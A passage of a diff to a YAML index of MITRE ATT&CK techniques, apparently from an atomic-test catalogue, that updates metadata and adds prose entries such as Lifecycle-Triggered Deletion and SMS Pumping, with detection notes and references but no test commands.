-      - source_name: Botnet Scan
-        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
-        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
-          a Botnet. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:46:55.039Z'
       name: Scanning IP Blocks
       description: |-
         Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -56594,19 +57259,41 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Diego Sappa, Securonix
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
 
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+      created: '2020-10-02T16:54:23.193Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1595/001
+        external_id: T1595.001
+      - source_name: Botnet Scan
+        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+          a Botnet. Retrieved October 20, 2020.
+        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1590.001:
     technique:
@@ -56664,7 +57351,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.005:
     technique:
@@ -56685,7 +57371,7 @@ reconnaissance:
       - source_name: Shodan
         url: https://shodan.io
         description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:49.260Z'
       name: Scan Databases
       description: |-
         Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -56701,8 +57387,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.001:
     technique:
@@ -56728,7 +57412,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.025Z'
       name: Determine Physical Locations
       description: |-
         Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -56744,8 +57428,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.001:
     technique:
@@ -56769,7 +57451,7 @@ reconnaissance:
         url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
         description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
           Pad For Phishing Attacks. Retrieved October 20, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:43:12.843Z'
       name: Spearphishing Service
       description: |-
         Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56791,13 +57473,11 @@ reconnaissance:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 impact:
   T1561.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:32:05.064Z'
       name: Disk Structure Wipe
       description: "Adversaries may corrupt or wipe the disk data structures on a
         hard drive necessary to boot a system; targeting specific critical systems
@@ -56889,13 +57569,12 @@ impact:
         url: https://www.symantec.com/connect/blogs/shamoon-attacks
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1498.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:54:49.943Z'
       name: Direct Network Flood
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -56904,7 +57583,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
@@ -56921,17 +57599,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
@@ -56956,7 +57629,8 @@ impact:
         url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491.002:
     technique:
@@ -56994,7 +57668,7 @@ impact:
         description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
           Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
           How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:37.539Z'
       name: External Defacement
       description: 'An adversary may deface systems external to an organization in
         an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -57028,12 +57702,10 @@ impact:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_impact_type:
       - Integrity
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1499.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:51.289Z'
       name: OS Exhaustion Flood
       description: |-
         Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -57098,42 +57770,127 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
-  T1499.003:
+  T1485.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
+      modified: '2024-10-16T21:27:02.481Z'
+      name: Lifecycle-Triggered Deletion
+      description: "Adversaries may modify the lifecycle policies of a cloud storage
+        bucket to destroy all objects stored within.  \n\nCloud storage buckets often
+        allow users to set lifecycle policies to automate the migration, archival,
+        or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+        GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+        has sufficient permissions to modify these policies, they may be able to delete
+        all objects at once. \n\nFor example, in AWS environments, an adversary with
+        the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+        API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+        in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+        to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+        adversaries may also perform this action on buckets storing cloud logs for
+        [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+        Datadog S3 Lifecycle CloudTrail Logs)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Storage: Cloud Storage Modification'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+      created: '2024-09-25T13:16:14.166Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1485/001
+        external_id: T1485.001
+      - source_name: AWS Storage Lifecycles
+        description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+          25, 2024.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+      - source_name: GCP Storage Lifecycles
+        description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+          September 25, 2024.
+        url: https://cloud.google.com/storage/docs/lifecycle
+      - source_name: Azure Storage Lifecycles
+        description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+          policy. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+      - source_name: Palo Alto Cloud Ransomware
+        description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+          in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+          2024.'
+        url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+      - source_name: Datadog S3 Lifecycle CloudTrail Logs
+        description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+          S3 Lifecycle Rule. Retrieved September 25, 2024.
+        url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.003:
+    technique:
+      modified: '2024-10-16T17:45:14.210Z'
+      name: SMS Pumping
+      description: |-
+        Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+        Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
       type: attack-pattern
-      created: '2020-02-20T15:35:00.025Z'
+      id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+      created: '2024-09-25T13:53:19.586Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1499.003
-        url: https://attack.mitre.org/techniques/T1499/003
-      - source_name: Arbor AnnualDoSreport Jan 2018
-        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
-          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
-          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
-          Infrastructure Security Report. Retrieved April 22, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1496/003
+        external_id: T1496.003
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Twilio SMS Pumping
+        description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+          Stop It. Retrieved September 25, 2024.
+        url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+      - source_name: Twilio SMS Pumping Fraud
+        description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+          25, 2024.
+        url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1499.003:
+    technique:
+      modified: '2024-10-15T15:41:49.168Z'
       name: Application Exhaustion Flood
       description: 'Adversaries may target resource intensive features of applications
         to cause a denial of service (DoS), denying availability to those applications.
@@ -57144,13 +57901,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
 
         In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -57158,12 +57922,33 @@ impact:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      created: '2020-02-20T15:35:00.025Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1499/003
+        external_id: T1499.003
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: Arbor AnnualDoSreport Jan 2018
+        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+          Infrastructure Security Report. Retrieved April 22, 2019.
+        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1561:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-20T18:16:41.942Z'
       name: Disk Wipe
       description: |-
         Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -57224,109 +58009,79 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1565.001:
     technique:
+      modified: '2024-08-26T16:33:33.982Z'
+      name: Stored Data Manipulation
+      description: |-
+        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: Where applicable, inspect important file hashes, locations,
+        and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      - 'File: File Creation'
+      - 'File: File Deletion'
+      x_mitre_impact_type:
+      - Integrity
       type: attack-pattern
       id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
       created: '2020-03-02T14:22:24.410Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.001
         url: https://attack.mitre.org/techniques/T1565/001
+        external_id: T1565.001
       - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
         description: Department of Justice. (2018, September 6). Criminal Complaint
           - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
       - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
         description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
           November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
-        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Stored Data Manipulation
-      x_mitre_detection: Where applicable, inspect important file hashes, locations,
-        and modifications for suspicious/unexpected values.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'File: File Modification'
-      - 'File: File Creation'
-      - 'File: File Deletion'
-      x_mitre_impact_type:
-      - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1489:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
-      created: '2019-03-29T19:00:55.901Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1489
-        url: https://attack.mitre.org/techniques/T1489
-      - source_name: SecureWorks WannaCry Analysis
-        url: https://www.secureworks.com/research/wcry-ransomware-analysis
-        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
-          Analysis. Retrieved March 26, 2019.
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Novetta Blockbuster
-        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
-        description: 'Novetta Threat Research Group. (2016, February 24). Operation
-          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
-          25, 2016.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-12T15:57:27.380Z'
+      name: Service Stop
       description: "Adversaries may stop or disable services on a system to render
         those services unavailable to legitimate users. Stopping critical services
         or processes can inhibit or stop response to an incident or aid in the adversary's
         overall objectives to cause damage to the environment.(Citation: Talos Olympic
         Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
         this by disabling individual services of high importance to an organization,
-        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible
-        (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
-        many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible.(Citation:
+        Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+        all services to render systems unusable.(Citation: Talos Olympic Destroyer
         2018) Services or processes may not allow for modification of their data stores
         while running. Adversaries may stop services or processes in order to conduct
         [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
         for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
         of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Service Stop
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
 
@@ -57335,10 +58090,14 @@ impact:
         Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
 
         Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, <code>ChangeServiceConfigW</code> may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Process: Process Termination'
@@ -57349,39 +58108,37 @@ impact:
       - 'Service: Service Metadata'
       x_mitre_impact_type:
       - Availability
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+      created: '2019-03-29T19:00:55.901Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1489
+        external_id: T1489
+      - source_name: SecureWorks WannaCry Analysis
+        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+          Analysis. Retrieved March 26, 2019.
+        url: https://www.secureworks.com/research/wcry-ransomware-analysis
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Novetta Blockbuster
+        description: 'Novetta Threat Research Group. (2016, February 24). Operation
+          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+          25, 2016.'
+        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1489
     atomic_tests: []
   T1499.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
-      type: attack-pattern
-      created: '2020-02-20T15:37:27.052Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1499.004
-        url: https://attack.mitre.org/techniques/T1499/004
-      - source_name: Sucuri BIND9 August 2015
-        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
-        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
-          in the Wild. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T15:42:23.001Z'
       name: Application or System Exploitation
